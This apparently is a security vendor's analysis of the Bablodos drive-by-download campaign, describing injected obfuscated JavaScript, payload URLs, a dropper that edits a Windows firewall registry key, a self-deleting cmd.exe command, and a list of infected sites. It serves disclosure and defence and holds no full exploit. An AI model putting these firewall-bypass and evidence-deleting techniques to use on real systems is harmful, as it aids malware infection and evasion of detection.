Anatomy of the Bablodos drive-by-download attack

Hackers have come to rely less on distributing malware via email
attachments, and have opted for infecting legitimate websites with
drive-by-downloads as the de facto way of more aggresssive
distribution. Just by loading an infected web page in a browser, a
virus can be downloaded to a computer without knowledge of the user.
The implications are often disastrous and range from reputation/brand
and revenue loss to data theft.

One particular attack stood out due to the number of exploits it
used and the number of processes it started -- it was quite "blatant".
While hackers often take steps to evade detection, Bablodos didn't
seem to bother. Based on Dasient's last malware report for 2009
the average number of extra processes initiated by hackers in Q4 '09
was just 2.8 -- enough for a downloader and perhaps one or
two pieces of malware. (As a comparison, in previous years,
a drive-by download would often initiate 10 or more
extra processes, ostensibly in an attempt to maximize the return from
each infected endpoint.) This shows us that attackers are getting
smarter about the way they structure their attacks, opting for a
smaller fingerprint on an infected machine in exchange for a greater
likelihood of evading detection.

Enter bablodos.com. This brazen attack took advantage of a large
number of different vulnerabilities on the user's computer, modified
personal firewall settings and then deleted itself off the disk after 5
seconds of starting as many as 8 processes. Obviously it wasn't trying to hide
anything and the goal was to cause as much damage as possible in a short amount of time.
Clearly, some of today's hackers aren't afraid of being detected.

So how exactly does this attack work?

STEP 1

Bablodos .com infects vulnerable sites by injecting obfuscated javascript code on their web pages.

Here is the first few bytes of the malicious JS snippet: "document.write(String.fromCharCode(60,116,97,98,108,101,32,98,111,114,100..."

This JS code sources in

bablodos .com/x/jar.jar
bablodos .com/counter/swf.swf
bablodos .com/counter/exe.php
bablodos .com/counter/pdf.php

to look for vulnerabilities in Flash and Pdf plugins and Java Runtime Environment.

STEP 2

Users visiting these victim sites get infected in the following way:

* An executable named file.exe is downloaded into the \Documents and Settings\%USER% folder, and run without the user's consent. It is classified as a downloader by many antivirus engines according to this Virustotal analysis.

* This executable bypasses the Windows Firewall by modifying the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

* Then it downloads additional malware and starts new processes as many as 8 into the temp folder that have file names comprised of 10 random character such as
SUHyAwDJUT.exe, AJvvOxjPBD.exe, YylDMSreSn.exe etc.

* To avoid detection, the downloaded malware is deleted from disk after starting execution with the command:
C:\WINDOWS\system32\cmd.exe /c timeout 5 && del %TEMP%\[10chars].exe

Since January of this year at least 50 sites have been hit by bablodos.com, some of which are:

123-real-estate-riverside .com
3rbytv .com
addisdimts .com
allmyanmar .com
ar-movies .blogspot.com
bellsnwhistles .com
cfusion .com
deskbeauty .com
dogtraininghealthcare .com
eetcorp .com
el34world .com
ericbae .com
faithfulnews .com
funinternet .net
games420 .com
ganoi .us
gdp .com
goldcoastsewing .com
goldmedaldeals .com
gospeladvocate .com
hamiltonknife .com
healthyhuman .net
hipforums .com
homeofourfathers .com
icarly-show .com
jerryswallpaper .com
jpickup .com
lyainc .com
maxeys .com
medicalartsschool .com
mideastreview .com
midorimiller .com
milwaukeenights .com
mjguide .com
mobilefull .com
npocu .org
patriotsbankmo .com
phuket-to-krabi .com
plentyofpuppies .com
pocketkittys .com
powertoolbattery .co.uk
scvan .org
shovelhead .us
tattoovirtual .com
thailandmagic .com
thailandsouthern .com
themes420 .com
travelbookingonline .com
tvgrounds .com
usa-battery .com
wallpapers2k .com

Had these sites been monitored by Dasient WAM they would have been alerted in real-time that the malware was on their site and they would have been able to contain the infection and prevent it from spreading.